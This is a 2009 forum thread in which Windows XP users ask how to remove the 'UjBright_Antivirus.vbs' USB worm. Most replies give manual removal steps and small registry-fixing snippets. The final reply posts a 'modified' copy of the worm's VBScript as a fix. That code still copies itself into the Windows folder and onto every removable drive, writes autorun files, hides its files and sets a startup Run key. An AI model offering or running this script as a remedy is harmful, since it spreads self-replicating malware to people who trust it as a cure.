Search : in
By :

Cannot find c:\windows\ujbright_antivirus.vbs

Last answer on Nov 17, 2009 3:35:15 pm GMT thene, on Jun 9, 2009 4:41:03 am BST 
 Report this message to moderators

Hello,
cannot find scrift file c:\windows\ujbright_antivirus.vbs please solve this problem this is coming startup and when i scan pen drives that scrift file it will come again and again

Configuration: Windows XP
Firefox 3.0.5

Best answers for « cannot find c:\windows\ujbright_antivirus.vbs » in :
Cannot find script file [C:WINDOWSsowar.vbs] Show Cannot find script file "C:\WINDOWS\sowar.vbs" Issue Solution Issue Whenever I start my laptop I get: Cannot find script file "C:\WINDOWS\sowar.vbs". I think this is a virus. What should I do to resolve this one? Another thing,...
Windows cannot find ‘C:\Windows\config\csrss.exe’ ShowWindows cannot find ‘C:\Windows\config\csrss.exe’ Issue Solution Note Issue I am keep getting the following message when windows get started. I don’t know what to do. Can anybody help me to solve this problem please. Solution This...
Where to find a C/C++ compiler ShowWhere to find a C/C++ compiler On Linux the gcc compiler is already available. To use it type in: gcc –o executable source(s) For Windows it’s quite different: click on the link below to find a list of free C/C++ compilers for...
FILE HOSTS OR LHOSTS: Failure to modify ShowFILE HOSTS OR LHOSTS: Failure to modify Solution When trying to delete the file host or Lmhosts under Windows Vista from admininstrator account, below error message appears on your screen: Unable to create the file C: \ Windows...
Download Clean the Windows ShowPC became an inevitable environment in daily life for the children of low age. Everything is good to initiate to them in the use of a computer. Clean The Windows is an ideal interactive program for very small, as well as big. Program allows to...
Windows - Diagnostic tools ShowAccessing diagnostic tools On the Desktop, when you right-click on a drive and go to Properties, the "Tools" tab gives you access to three tools: Defragmenter (c:\windows\defrag.exe) Scandisk (c:\windows\command\scandisk.exe) Backup (c:\program...
ODBC ShowWhat is ODBC? ODBC stands for Open Database Connectivity. This is a Microsoft-defined format for communicating between Windows database clients and consumer DBMSs. The ODBC managier can be found in Windows 3.1 and 9x. In Windows 95 and 98, it is...
Control - control.exe Showcontrol - control.exe control.exe (control stands for Control Panel) is a Windows NT/2000/XP generic process which corresponds to the control panel. The file that corresponds to this process is normally found in the directory...

1

hellocat, on Jun 9, 2009 7:58:25 am BST

This program have been delete, but you do not remove those dll files,
so system will load when you start your computer.
you can use this app to fix it.
go to http://blogs.digitalmediaonlineinc.com/registryfix/entry/200­90608
good luck.

Reply to hellocat

2

Elka846443, on Jun 21, 2009 3:00:34 pm BST
  • +1

This ujbright_antivirus.vbs is a variant of virus like the sowar.vbs, the script was edited by oxymoron from COTABATO CITY practicing to became a "kiddie-computer-wizard" . this asshole can be remove manually... Power on ur computer to safemode, using windows explorer, goto c:\windows then rename wscript.exe to wscriptures.exe , run regedit, delete the entry "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autome". exit... restart ur computer... if you are using usb flash drive, maybe it is contaminated by ujBright, use TURBONAV to view files in your usb flashdrive then delete these files: ujbright_antivirus.vbs, autorun.inf, readme.txt...(coz these file's attribute is hidden, read-only, and as system files.) do not use windows explorer, you can't see these files.

Reply to Elka846443

4

deepak, on Aug 16, 2009 6:03:51 am BST
  • +1

Dear friend, my system got infected with ujbirght_antivirus.vbs, autorun.inf and readme.txt file. I deleted it from my system using attrib command and formated that drive. Now my pendrive got infected with this file. I tried to remove it in the same way using attrib command, formating but it did not work.Whenever i try to remove it safely it gives a msg "the generic disk cannot be stopped.tryto remove it later".when i try to format it it gives a msgsome disk utilities is running so it cannot be formatted. pls help me i am stuck withit.even using avg with update has not worked. i tried to format in other systembut in vain.it would be better if u mail me.

Reply to deepak

5

YD, on Aug 16, 2009 10:15:56 am BST

What's your mail ? ... drop in a mail to ydntn.vaidyanathan@gmail.com .... i'll tell you how to fix this and also how to avoid such problems in the future

Reply to YD

10

ganu, on Oct 18, 2009 7:49:12 am BST

Hi dis is my email id ganeshruling@yahoo.co.in

Reply to ganu

13

syed arshad, on Oct 19, 2009 3:38:11 am BST

Dear friend, my system got infected with ujbirght_antivirus.vbs, autorun.inf and readme.txt file. I deleted it from my system using attrib command and formated that drive. Now my pendrive got infected with this file. I tried to remove it in the same way using attrib command, formating but it did not work.Whenever i try to remove it safely it gives a msg "the generic disk cannot be stopped.tryto remove it later".when i try to format it it gives a msgsome disk utilities is running so it cannot be formatted. pls help me i am stuck withit.even using avg with update has not worked. i tried to format in other systembut in vain.it would be better if u mail me.

Reply to syed arshad

6

Sid, on Aug 16, 2009 10:24:25 am BST

Hi Deepak,

Even I had the same problem

as far the deletion of the virus from your pendrive is concerned you need to format it altogether and then Boot to safe mode. Choose the system administrator which is shown only in safe mode. This will allow you to delete the the UJBright_anitvirus.vbs file from C:\windows\ . Then open the registry editor and navogate to HKey\Local_machine\Software\Microsoft\Windows\Current Version\Run and delete the dword value autome.

In case you are no unable to find the system administrator account then it is directly reformat the system after reformatting your pendrive.

Even this does not work out then download a linux based OS probably Ubuntu 8.04 or higher. Boot using the live CD and navigate to the windows partion no your computer and remove the script and also from your pen drive. Reason is that when we boot from the linux all attributes of windows are disabled and .exe or .vbs files cannot be executed.

Regards
Sid

Reply to Sid

7

aash, on Oct 16, 2009 5:21:29 am BST

I m having a virous peroblem in my laptop.a display come when i starat my laptoo like as can not find the script file "C:\Windows\UjBright_Antivirus.vbs".pls tell me how can i remove it.please send ur answer on my mail id.thank you

Reply to aash

8

Sid, on Oct 16, 2009 6:23:00 am BST

Clcik on Start - click on run - type regedit -click on enter
This open the registry editor
click on the plus mark next to HKEY_LOCAL_MACHINE
SOFTWARE
Microsoft
Windows
CurrentVersion
Run
on the right hand side you will find the file auotme
right lick and delete it
restart ur computer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion­\Run\autome". exit... restart ur computer

Reply to Sid

16

 deepzii, on Nov 17, 2009 3:35:15 pm GMT

Tnx a lot sid! it works

Reply to deepzii

11

ganu, on Oct 18, 2009 5:49:49 pm BST

Wat is TURBONAV

Reply to ganu

3

yd, on Jul 16, 2009 9:58:32 am BST
  • +3

The file was deleted by your antivirus.
So, go to cmd prompt, and type the following. If H: is the pendrive, then

H:\> del /F /a autorun.inf

Then go to run and type msconfig
Navigate to the start-up folder and uncheck the entry for UjBright.. (If the virus is still there)
Now go to task-manager (alt-ctrl-del) and kill the process called wscript.exe (If the virus is still there)
Now take the following two lines of code and save them as anything.vbs
____________________________________________________________

Set Shell = CreateObject( "WScript.Shell" )
Shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
____________________________________________________________
Now take the following lines of code and save as something.reg

____________________________________________________________

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091
"NoDrives"=dword:00000000
"NoViewOnDrive"=dword:00000000
"NofolderOptions"=dword:00000000
____________________________________________________________

Also, check out stupidviruses.blogspot.com/

Reply to yd

9

vijji, on Oct 18, 2009 4:14:19 am BST
  • +1

I m having a problem in my laptop.a display come when i start my laptop like as can not find the script file "C:\Windows\UjBright_Antivirus.vbs".pls tell me how can i remove it.please send ur answer on my mail id.thank you

Reply to vijji

12

Sid, on Oct 19, 2009 3:02:42 am BST

Please read my replies for the date Oct 16, 2009 6:23:00 am BST

Reply to Sid

14

mk, on Oct 24, 2009 12:32:52 am BST

Thx bro. worked fine and gr8 for me

Reply to mk

15

MITaw, on Nov 8, 2009 2:15:45 pm GMT

The file UjBright_Antivirus.vbs infects the systems and changes Explorer>Menu>Tools>Folder options> and changes the file attributes to NOT show hidden files, It also disables registry editing, so that we cannot disable the virus from being active.

I changed the file Uj UjBright_Antivirus.vbs;
I changed the registry enteries to enable whatever this file was disabling and i added for it to end the viral script.
This file u copy to /systemroot/windows/ folder. It will run once and then stop. No infections alas it clears the changes made by the virus.
===================

On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "UjBright_Antivirus_vbs.txt" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\UjBright_Antivirus_vbs.txt")

Set myFile = fso.CreateTextFile(win &

"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39

wscr.RegWrite

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

autoMe", " """ & win & "\UjBright_Antivirus_vbs.txt"""

If ax = false Then wscr.Run "wscript.exe """ & win &

"\UjBright_Antivirus_vbs.txt"""

While (true)

Set myDrives = fso.Drives
For Each myFlashDrive In myDrives

If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:"

Then

If fso.FileExists(myFlashDrive.Path & "\Autorun.inf")

Then
Set fAttr = fso.Getfile(myFlashDrive.Path &

"\Autorun_inf.txt")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun_inf.txt",

true
End If

Set auFile = fso.CreateTextFile(myFlashDrive.Path &

"\Autorun_inf.txt", true)
auFile.write "[autorun]" & vbCrLf & "open=\" & vbCrLf &

"open=wscript.exe UjBright_Antivirus_vbs.txt" & vbCrLf &

"shell\Open\Command=wscript.exe UjBright_Antivirus_vbs.txt" &

vbCrLf & "shell\Open\Default=1"
auFile.close

Set auFile = fso.CreateTextFile(myFlashDrive.Path &

"\README_MIT_.txt", true)
auFile.write "Hello FRIENDS:" & vbCrLf & "" & vbCrLf & ""

& vbCrLf & "" & vbCrLf & " " & vbCrLf & "modified to negate virus

infection by DR.MHMD IMRAN T., +919441119044 Hyderabad, India" &

vbCrLf & " " & vbCrLf & "PARA SA GUSTONG MAGPA-ADVERTISE:" &

vbCrLf & "He wrote the virus >>> JUST CONTACT ME: 09083223171 -

UJBRIGHT"
auFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path &

"\Autorun_inf.txt")
fAttr.Attributes=39

Set myFile = fso.CreateTextFile(myFlashDrive.Path &

"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path &

"\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39

End If

Next

With wscr
.RegWrite

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

autoMe", " """ & win & "\UjBright_Antivirus.txt"""
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo

rer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo

rer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo

rer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\System\DisableTaskMgr", 0, "REG_DWORD"
End With

If tf <> win & "\UjBright_Antivirus.txt" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If

WScript.Sleep 10000
WScript.Quit

Wend
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Reply to MITaw